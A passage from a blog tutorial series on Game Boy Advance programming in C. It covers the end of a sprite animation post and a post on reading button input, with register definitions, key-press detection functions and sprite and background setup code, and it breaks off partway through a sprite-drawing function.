<p>Knowing that, it’s probably useful for us to take another look at our sprite sheet, and figure out where our walk, run, and jump cycles start in the seet. I’ve oultined them below:</p>
<div align="center">
<img src="/images/post_images/2017-06-07/charsprites_highlighted.bmp" />
<br />
</div>
<p>So that puts our idle cycle starting at index 0, our run cycle at index 4, and our jump cycle at index 7. Given that we use 4 tiles per sprite, and have 8bpp tiles, this means that the real indices we need are:</p>
<ul>
<li>Idle starts at 0</li>
<li>Run starts at 32</li>
<li>Jump starts at 56</li>
</ul>
<p>Let’s start off by just writing the first and last line of our function:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">tickSpriteAnimation</span><span class="p">(</span><span class="n">HeroSprite</span><span class="o">*</span> <span class="n">sprite</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">ObjectAttributes</span><span class="o">*</span> <span class="n">spriteAttribs</span> <span class="o">=</span> <span class="n">sprite</span><span class="o">-></span><span class="n">spriteAttribs</span><span class="p">;</span>
<span class="c1">//set firstAnimCycleFrame and animFrame in code here</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr2</span> <span class="o">=</span> <span class="n">sprite</span><span class="o">-></span><span class="n">firstAnimCycleFrame</span> <span class="o">+</span> <span class="p">(</span><span class="n">sprite</span><span class="o">-></span><span class="n">animFrame</span> <span class="o">*</span> <span class="mi">8</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>This is just to give you an idea of how this function works. Note that if you were using 8bpp sprites, you would only need to multiply animFrame by 4.</p>
<p>Alright, here’s our first, and easiest case: jumping. We only have 2 sprites for jumping, one when we’re on the way up, and one when we’re on the way down.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">int</span> <span class="n">isMidAir</span> <span class="o">=</span> <span class="n">sprite</span><span class="o">-></span><span class="n">posY</span> <span class="o">!=</span> <span class="n">FLOOR_Y</span><span class="p">;</span>
<span class="c1">//update velocity for gravity</span>
<span class="k">if</span> <span class="p">(</span><span class="n">isMidAir</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">firstAnimCycleFrame</span> <span class="o">=</span> <span class="mi">56</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">animFrame</span> <span class="o">=</span> <span class="n">sprite</span><span class="o">-></span><span class="n">velY</span> <span class="o">></span> <span class="mi">0</span> <span class="o">?</span> <span class="mi">1</span> <span class="o">:</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>If we aren’t in the air, the only other two options are that we’re standing still, or that we’re walking around:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">else</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">sprite</span><span class="o">-></span><span class="n">velX</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">firstAnimCycleFrame</span> <span class="o">=</span> <span class="mi">32</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">animFrame</span> <span class="o">=</span> <span class="p">(</span><span class="o">++</span><span class="n">sprite</span><span class="o">-></span><span class="n">animFrame</span><span class="p">)</span> <span class="o">%</span> <span class="mi">3</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span>
<span class="p">{</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">firstAnimCycleFrame</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">animFrame</span> <span class="o">=</span> <span class="p">(</span><span class="o">++</span><span class="n">sprite</span><span class="o">-></span><span class="n">animFrame</span><span class="p">)</span> <span class="o">%</span> <span class="mi">4</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>Obviously none of this code is very re-useable; we are hardcoding both the length of the anim cycles, and their start points in sprite sheets, but it works for our example.</p>
<p>With the above two chunk of code added to our animation function, all that’s left is to call the animation function from main:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vsync</span><span class="p">();</span>
<span class="n">key_poll</span><span class="p">();</span>
<span class="n">updateSpritePosition</span><span class="p">(</span><span class="o">&</span><span class="n">sprite</span><span class="p">);</span>
<span class="n">tickSpriteAnimation</span><span class="p">(</span><span class="o">&</span><span class="n">sprite</span><span class="p">);</span>
<span class="n">MEM_OAM</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">oam_object_backbuffer</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="p">}</span></code></pre></figure>
<p>And you should (finally) be in possession of your very on animated character!</p>
<h2 id="wrapping-up">Wrapping Up</h2>
<p>If you got stuck at any part of this, the code for the finished product can be found <a href="https://github.com/khalladay/GBA-By-Example/tree/master/4-SpriteAnimation">on github</a>.</p>
<p>Finally, as always, I’m available <a href="https://twitter.com/khalladay">on Twitter</a> to answer questions, say hi, etc. I’d love to hear if you’re building something for the GBA after reading these posts :)</p>
<p>Have a good one!</p>
GBA By Example - Getting User Input2017-04-18T00:00:00+00:00http://kylehalladay.com/blog/tutorial/gba/2017/04/18/GBA-By-Example-4<p>(Note: This is Part 5 of my GBA by Example series. A list of my other GBA tutorials can be found <a href="http://kylehalladay.com/gba.html">here</a>)</p>
<p>We’ve covered an awful lot of drawing in these posts, but it takes a lot more than drawing code to make a game. One of the key parts of building something playable is letting users actually be able to interact with our code, so today I’m going to go over how to get user input on the GBA. It’s going to be short and sweet, because it’s really not that complicated on this platform, which is great, because it means that we can spend more time on building an example program this week.</p>
<p>By the end of the post today, we’re going to end up with a simple program that displays a sprite and changes the background based on what button was last pressed. It’s going to look something like this:</p>
<div align="center">
<img src="/images/post_images/2017-04-18/input.gif" />
<font size="2"> Initially this cleared the screen after each press so I could properly do the Konami code.<br />The gif was reeeaalllyy annoying though</font>
<br /><br />
</div>
<p>Let’s get started :)</p>
<h2 id="detecting-what-keys-are-pressed">Detecting What Keys Are Pressed</h2>
<p>I assume if you’re interested in these posts, you already know what a GBA looks like. Just in case, here’s a photo with all the inputs shows:</p>
<div align="center">
<img src="/images/post_images/2017-04-18/gba.jpg" />
<br />
</div>
<p>The GBA has 10 buttons that the user can press while a game is running:</p>
<ul>
<li>A / B buttons</li>
<li>Start / Select Buttons</li>
<li>R / L Shoulder Buttons</li>
<li>DPAD - (Left, Right, Up, Down)</li>
</ul>
<p>Each of these buttons can be in one of two states - down or up. Conveniently, the state of every button is stored in a single 16 bit value (with only the lower 10 bits used). This value is known as the <em>Input</em> Register. It, and the location of each key’s corresponding bit are as follows:</p>
<div align="center">
<table style="border:1px solid black; width=600px; padding:2px;">
<colgroup>
<col width="200px" />
<col width="400px" />
</colgroup>
<thead style="border:1px solid black; background-color:#FF8854;">
<tr class="header">
<th>REG_INPUT</th>
<th> 0x FEDC BA98 7654 3210</th>
</tr>
</thead>
<tbody>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td>FEDCBA</td>
<td style="border:1px solid black;">Ignored / Undefined Data</td>
</tr>
<tr style="border:1px solid black;">
<td style="border:1px solid black;">9</td>
<td>Left Shoulder Button </td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">8</td>
<td>Right Shoulder Button</td>
</tr>
<tr style="border:1px solid black;">
<td style="border:1px solid black;">7</td>
<td>DPAD -> Down</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">6</td>
<td>DPAD -> Up</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">5</td>
<td>DPAD -> Left</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">4</td>
<td>DPAD -> Right</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">3</td>
<td>Start Button</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">2</td>
<td>Select Button</td>
</tr>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">1</td>
<td>B Button</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">0</td>
<td>A Button</td>
</tr>
</tbody>
</table>
</div>
<p><br /></p>
<p>The only bit of weirdness with all of this is that the GBA represents keys which are in their Up (un-pressed) state with a value of 1, and keys that are pressed with a value of 0. This means that if we were to read the value of the input register while the Start button was pressed, we would expect to see a value of <strong>0x0000 0011 1111 0111</strong>, notice that the bit that corresponds to the start button is 0, because the button is down.</p>
<p>Turning the above table into a set of constants representing which bit is set for each key looks lkke this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#define REG_KEYINPUT (* (volatile uint16*) 0x4000130)
</span>
<span class="cp">#define KEY_A 0x0001
#define KEY_B 0x0002
#define KEY_SELECT 0x0004
#define KEY_START 0x0008
#define KEY_RIGHT 0x0010
#define KEY_LEFT 0x0020
#define KEY_UP 0x0040
#define KEY_DOWN 0x0080
#define KEY_R 0x0100
#define KEY_L 0x0200
</span>
<span class="cp">#define KEY_MASK 0xFC00</span></code></pre></figure>
<p>and using the above table, a function that returns a non zero value if a key is down might look like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">uint32</span> <span class="nf">getKeyState</span><span class="p">(</span><span class="n">uint16</span> <span class="n">key_code</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="o">!</span><span class="p">(</span><span class="n">key_code</span> <span class="o">&</span> <span class="p">(</span><span class="n">REG_INPUT</span> <span class="o">|</span> <span class="n">KEY_MASK</span><span class="p">)</span> <span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>Because we aren’t immediately inverting the value in the input register (like <a href="http://www.coranac.com/tonc/text/keys.htm">Tonc</a> does), the bitwise logic for this can be a bit unintuitive, so let’s walk through how the above function works.</p>
<p>For the example, let’s assume that we’re testing to see if the Start button is currently pressed:</p>
<ul>
<li>First, We get the value from the REG_INPUT register, and OR it with a bit mask that makes sure the undefined bits in the value are set to 1 (called KEY_MASK above)</li>
</ul>
<figure class="highlight"><pre><code class="language-c" data-lang="c"> <span class="nl">INPUT:</span> <span class="o">????</span> <span class="o">??</span><span class="mi">11</span> <span class="mi">1111</span> <span class="mo">0111</span>
<span class="n">FLAG</span> <span class="o">:</span> <span class="mi">1111</span> <span class="mi">1100</span> <span class="mo">0000</span> <span class="mo">0000</span>
<span class="o">--------------------------</span>
<span class="mi">1111</span> <span class="mi">1111</span> <span class="mi">1111</span> <span class="mo">0111</span></code></pre></figure>
<ul>
<li>Next we AND the value with the Start mask: 0x0008</li>
</ul>
<figure class="highlight"><pre><code class="language-c" data-lang="c"> <span class="nl">INPUT:</span> <span class="mi">1111</span> <span class="mi">1111</span> <span class="mi">1111</span> <span class="mo">0111</span>
<span class="n">START</span><span class="o">:</span> <span class="mo">0000</span> <span class="mo">0000</span> <span class="mo">0000</span> <span class="mi">1000</span>
<span class="o">--------------------------</span>
<span class="n">val</span><span class="o">=</span> <span class="mi">0</span><span class="n">x</span> <span class="mo">0000</span> <span class="mo">0000</span> <span class="mo">0000</span> <span class="mo">0000</span>
<span class="nf">return</span> <span class="p">(</span><span class="o">!</span><span class="n">val</span><span class="p">);</span> <span class="c1">//true, key is DOWN</span></code></pre></figure>
<ul>
<li>
<p>This gives us 0, because of how the GBA stores key states (Remember, 1 is UP), so we just return whether our result == false so that we get a non zero value when the button is down</p>
</li>
<li>
<p>If instead of the Start Mask, we checked a different button, like the A Button:</p>
</li>
</ul>
<figure class="highlight"><pre><code class="language-c" data-lang="c"> <span class="nl">INPUT:</span> <span class="mi">1111</span> <span class="mi">1111</span> <span class="mi">1111</span> <span class="mo">0111</span>
<span class="n">A</span> <span class="n">BTN</span><span class="o">:</span> <span class="mo">0000</span> <span class="mo">0000</span> <span class="mo">0000</span> <span class="mo">0001</span>
<span class="o">--------------------------</span>
<span class="n">val</span><span class="o">=</span> <span class="mi">0</span><span class="n">x</span> <span class="mo">0000</span> <span class="mo">0000</span> <span class="mo">0000</span> <span class="mo">0001</span>
<span class="nf">return</span> <span class="p">(</span><span class="o">!</span><span class="n">val</span><span class="p">);</span> <span class="c1">//false, key is UP</span></code></pre></figure>
<p>The KEY_MASK constant is important for this function to work, because we have no idea that the top 6 bits of this value are being set to (whatever it is, it’s junk data), and we want to be sure that we’re only testing our key_code value against data that we expect is in the input register.</p>
<p>Always masking the KEY_INPUT register by the KEY_MASK value seems a bit excessive to me though. What I prefer to do (and what you’ll see elsewhere on line), is to use a function that will store the value in the input register in a 16 bit variable, and perform the masking then. This function is called once per frame, and then you don’t have to worry about OR-ing with KEY_MASK every time you want to read a value from the hardware:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">uint16</span> <span class="n">input_cur</span><span class="p">;</span>
<span class="kr">inline</span> <span class="kt">void</span> <span class="nf">key_poll</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">input_cur</span> <span class="o">=</span> <span class="n">REG_KEYINPUT</span> <span class="o">|</span> <span class="n">KEY_MASK</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">uint32</span> <span class="nf">getKeyState</span><span class="p">(</span><span class="n">uint16</span> <span class="n">key_code</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="o">!</span><span class="p">(</span><span class="n">input_cur</span> <span class="o">&</span> <span class="n">key_code</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">key_poll</span><span class="p">();</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">getKeyState</span><span class="p">(</span><span class="n">KEY_L</span><span class="p">)</span> <span class="p">)</span>
<span class="p">{</span>
<span class="c1">//key is down</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>This is great, but it only lets us test if the user is currently holding down a key, it doesn’t let us detect if the key has been just pressed. This is great for things like charging an attack, but not as good for something like triggering a jump, because it’s going to read as true for multiple frames unless your user has the reflexes of a cat.</p>
<h2 id="detecting-key-press-and-key-release">Detecting Key Press and Key Release</h2>
<p>The obvious next thing we need to do is to be able to detect if the user has just started pressing or releasing a button. To do this, we need to store a second input state variable, that holds the input of the previous frame. To determine if a key’s state is new, we just have to compare the current frame’s input register to the one from the previous frame. It makes sense to do this register-copying inside the function we use to store the current frame’s input:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">uint16</span> <span class="n">input_cur</span><span class="p">;</span>
<span class="n">uint16</span> <span class="n">input_prev</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">key_poll</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">input_prev</span> <span class="o">=</span> <span class="n">input_cur</span><span class="p">;</span>
<span class="n">input_cur</span> <span class="o">=</span> <span class="n">REG_KEYINPUT</span> <span class="o">|</span> <span class="n">KEY_MASK</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Then all we need are two new functions to detect key press and release:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">uint16</span> <span class="nf">wasKeyPressed</span><span class="p">(</span><span class="n">uint16</span> <span class="n">key_code</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="p">(</span><span class="n">input_cur</span> <span class="o">&</span> <span class="o">~</span><span class="n">input_prev</span><span class="p">)</span> <span class="o">&</span> <span class="n">key_code</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">uint16</span> <span class="nf">wasKeyReleased</span><span class="p">(</span><span class="n">uint16</span> <span class="n">key_code</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="p">(</span><span class="o">~</span><span class="n">input_cur</span> <span class="o">&</span> <span class="n">input_prev</span><span class="p">)</span> <span class="o">&</span> <span class="n">key_code</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>If you’re confused by the above, writing it out on paper really helps, but I’m going to skip walking through it here because it really only matters long enough to write the above functions.</p>
<p>When it’s all put together, your input handling code might look like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#ifndef INPUT_H
#define INPUT_H
</span>
<span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">input_cur</span> <span class="o">=</span> <span class="mh">0x03FF</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">input_prev</span> <span class="o">=</span> <span class="mh">0x03FF</span><span class="p">;</span>
<span class="cp">#define REG_KEYINPUT (* (volatile unsigned short*) 0x4000130)
</span>
<span class="cp">#define KEY_A 0x0001
#define KEY_B 0x0002
#define KEY_SELECT 0x0004
#define KEY_START 0x0008
#define KEY_RIGHT 0x0010
#define KEY_LEFT 0x0020
#define KEY_UP 0x0040
#define KEY_DOWN 0x0080
#define KEY_R 0x0100
#define KEY_L 0x0200
</span>
<span class="cp">#define KEY_MASK 0xFC00
</span>
<span class="kr">inline</span> <span class="kt">void</span> <span class="nf">key_poll</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">input_prev</span> <span class="o">=</span> <span class="n">input_cur</span><span class="p">;</span>
<span class="n">input_cur</span> <span class="o">=</span> <span class="n">REG_KEYINPUT</span> <span class="o">|</span> <span class="n">KEY_MASK</span><span class="p">;</span>
<span class="p">}</span>
<span class="kr">inline</span> <span class="kt">unsigned</span> <span class="kt">short</span> <span class="nf">wasKeyPressed</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">key_code</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="p">(</span><span class="n">key_code</span><span class="p">)</span> <span class="o">&</span> <span class="p">(</span><span class="o">~</span><span class="n">input_cur</span> <span class="o">&</span> <span class="n">input_prev</span><span class="p">);</span>
<span class="p">}</span>
<span class="kr">inline</span> <span class="kt">unsigned</span> <span class="kt">short</span> <span class="nf">wasKeyReleased</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">key_code</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="p">(</span><span class="n">key_code</span><span class="p">)</span> <span class="o">&</span> <span class="p">(</span><span class="n">input_cur</span> <span class="o">&</span> <span class="o">~</span><span class="n">input_prev</span><span class="p">);</span>
<span class="p">}</span>
<span class="kr">inline</span> <span class="kt">unsigned</span> <span class="kt">short</span> <span class="nf">getKeyState</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">key_code</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="o">!</span><span class="p">(</span><span class="n">key_code</span> <span class="o">&</span> <span class="p">(</span><span class="n">input_cur</span><span class="p">)</span> <span class="p">);</span>
<span class="p">}</span>
<span class="cp">#endif</span></code></pre></figure>
<p>That’s literally all there is to input handling on the GBA! You can stop here if that’s all you’re after, but I took it a step further and built the program you saw at the start of the article. I’m going to walk through how to put that together below.</p>
<p>But for the remainder of this post, and all future posts, I’m going to put the input handling code above into <strong>input.h</strong></p>
<h2 id="sprite-and-bg-data">Sprite and BG Data</h2>
<p>All the sprites that I’m using for the example project can be found <a href="https://github.com/khalladay/GBA-By-Example/tree/master/3-UserInput/data">on github</a>. It isn’t super compact, but for such a simple program, that’s not really that important. If you want to follow along as I build this, grab the data from there. If you just want the final product, you can find the whole thing <a href="https://github.com/khalladay/GBA-By-Example/tree/master/3-UserInput">on github here</a>.</p>
<p>The function to load the sprite data is as follows:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">uint8</span><span class="p">;</span>
<span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">uint16</span><span class="p">;</span>
<span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">uint32</span><span class="p">;</span>
<span class="k">typedef</span> <span class="n">uint16</span> <span class="n">ScreenBlock</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="k">typedef</span> <span class="n">uint16</span> <span class="n">Tile</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>
<span class="k">typedef</span> <span class="n">Tile</span> <span class="n">TileBlock</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="cp">#define MEM_PALETTE ((uint16*)(0x05000200))
#define MEM_TILE ((TileBlock*)0x6000000)
#define MEM_OAM ((volatile ObjectAttributes *)0x07000000)
</span>
<span class="k">typedef</span> <span class="k">struct</span> <span class="n">ObjectAttributes</span> <span class="p">{</span>
<span class="n">uint16</span> <span class="n">attr0</span><span class="p">;</span>
<span class="n">uint16</span> <span class="n">attr1</span><span class="p">;</span>
<span class="n">uint16</span> <span class="n">attr2</span><span class="p">;</span>
<span class="n">uint16</span> <span class="n">pad</span><span class="p">;</span>
<span class="p">}</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">packed</span><span class="p">,</span> <span class="n">aligned</span><span class="p">(</span><span class="mi">4</span><span class="p">)))</span> <span class="n">ObjectAttributes</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">LoadTileData</span><span class="p">()</span>
<span class="p">{</span>
<span class="c1">//each sprite is 32 tiles</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">MEM_PALETTE</span><span class="p">,</span> <span class="n">Pal</span><span class="p">,</span> <span class="n">PalLen</span> <span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">4</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span> <span class="n">ATiles</span><span class="p">,</span> <span class="n">TileLen</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">4</span><span class="p">][</span><span class="mi">32</span><span class="p">],</span> <span class="n">BTiles</span><span class="p">,</span> <span class="n">TileLen</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">4</span><span class="p">][</span><span class="mi">64</span><span class="p">],</span> <span class="n">SelectTiles</span><span class="p">,</span> <span class="n">TileLen</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">4</span><span class="p">][</span><span class="mi">96</span><span class="p">],</span> <span class="n">StartTiles</span><span class="p">,</span> <span class="n">TileLen</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">4</span><span class="p">][</span><span class="mi">128</span><span class="p">],</span> <span class="n">RIGHTTiles</span><span class="p">,</span> <span class="n">TileLen</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">4</span><span class="p">][</span><span class="mi">160</span><span class="p">],</span> <span class="n">LEFTTiles</span><span class="p">,</span> <span class="n">TileLen</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">4</span><span class="p">][</span><span class="mi">192</span><span class="p">],</span> <span class="n">UPTiles</span><span class="p">,</span> <span class="n">TileLen</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">4</span><span class="p">][</span><span class="mi">224</span><span class="p">],</span> <span class="n">DOWNTiles</span><span class="p">,</span> <span class="n">TileLen</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">5</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span> <span class="n">LTiles</span><span class="p">,</span> <span class="n">TileLen</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">5</span><span class="p">][</span><span class="mi">32</span><span class="p">],</span> <span class="n">RTiles</span><span class="p">,</span> <span class="n">TileLen</span><span class="p">);</span>
<span class="k">volatile</span> <span class="n">ObjectAttributes</span> <span class="o">*</span><span class="n">spriteAttribs</span> <span class="o">=</span> <span class="o">&</span><span class="n">MEM_OAM</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr0</span> <span class="o">=</span> <span class="mh">0x602F</span><span class="p">;</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr1</span> <span class="o">=</span> <span class="mh">0xC04F</span><span class="p">;</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr2</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>I’m not going to walk through this, because we’ve already covered how to load and set up sprites in <a href="http://kylehalladay.com/blog/tutorial/2017/04/04/GBA-By-Example-2.html">a previous post</a></p>
<p>I’m also using a simple 1 colour background in the gif from earlier, which I just created procedurally like so:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#define MEM_BG_PALETTE ((uint16*)(0x05000000))
#define MEM_SCREENBLOCKS ((ScreenBlock*)0x6000000)
#define REG_BG0_CONTROL *((volatile uint32*)(0x04000008))
</span>
<span class="kt">void</span> <span class="nf">CreateBackground</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">MEM_BG_PALETTE</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">RGB15</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">);</span>
<span class="n">uint8</span> <span class="n">tile</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">j</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">j</span> <span class="o"><</span> <span class="mi">64</span><span class="p">;</span> <span class="n">j</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">tile</span><span class="p">[</span><span class="n">j</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">0</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span> <span class="n">tile</span><span class="p">,</span> <span class="mi">64</span><span class="p">);</span>
<span class="n">uint16</span> <span class="n">screenBlock</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="mi">1024</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">screenBlock</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">MEM_SCREENBLOCKS</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="o">&</span><span class="n">screenBlock</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="mi">2048</span><span class="p">);</span>
<span class="n">REG_BG0_CONTROL</span> <span class="o">=</span> <span class="mh">0x0180</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Again, I’m not going to talk too much about this, because I covered it <a href="http://kylehalladay.com/blog/tutorial/2017/04/11/GBA-By-Example-3.html">last week</a>.</p>
<p>Great! Now that that’s out of the way, let’s do something more interesting.</p>
<h2 id="drawing-sprites">Drawing Sprites</h2>
<p>The most obvious thing to do is to draw a different sprite depending on what button is currently pressed. This is pretty easy since we laid our sprites out sequentially in memory:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kr">inline</span> <span class="n">uint16</span> <span class="nf">RGB15</span><span class="p">(</span><span class="n">uint32</span> <span class="n">red</span><span class="p">,</span> <span class="n">uint32</span> <span class="n">green</span><span class="p">,</span> <span class="n">uint32</span> <span class="n">blue</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">red</span> <span class="o">|</span> <span class="p">(</span><span class="n">green</span><span class="o"><<</span><span class="mi">5</span><span class="p">)</span> <span class="o">|</span> <span class="p">(</span><span class="n">blue</span><span class="o"><<</span><span class="mi">10</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">DrawSprite</span><span class="p">(</span><span class="n">uint16</span> <span class="n">key_code</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">const</span> <span class="n">uint16</span> <span class="n">keys</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span><span class="n">KEY_A</span><span class="p">,</span> <span class="n">KEY_B</span><span class="p">,</span> <span class="n">KEY_SELECT</span><span class="p">,</span>
<span class="n">KEY_START</span><span class="p">,</span> <span class="n">KEY_RIGHT</span><span class="p">,</span> <span class="n">KEY_LEFT</span><span class="p">,</span>
<span class="n">KEY_UP</span><span class="p">,</span> <span class="n">KEY_DOWN</span><span class="p">,</span> <span class="n">KEY_L</span><span class="p">,</span> <span class="n">KEY_R</span><span class="p">};</span>
<span class="kt">int</span> <span class="n">idx</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
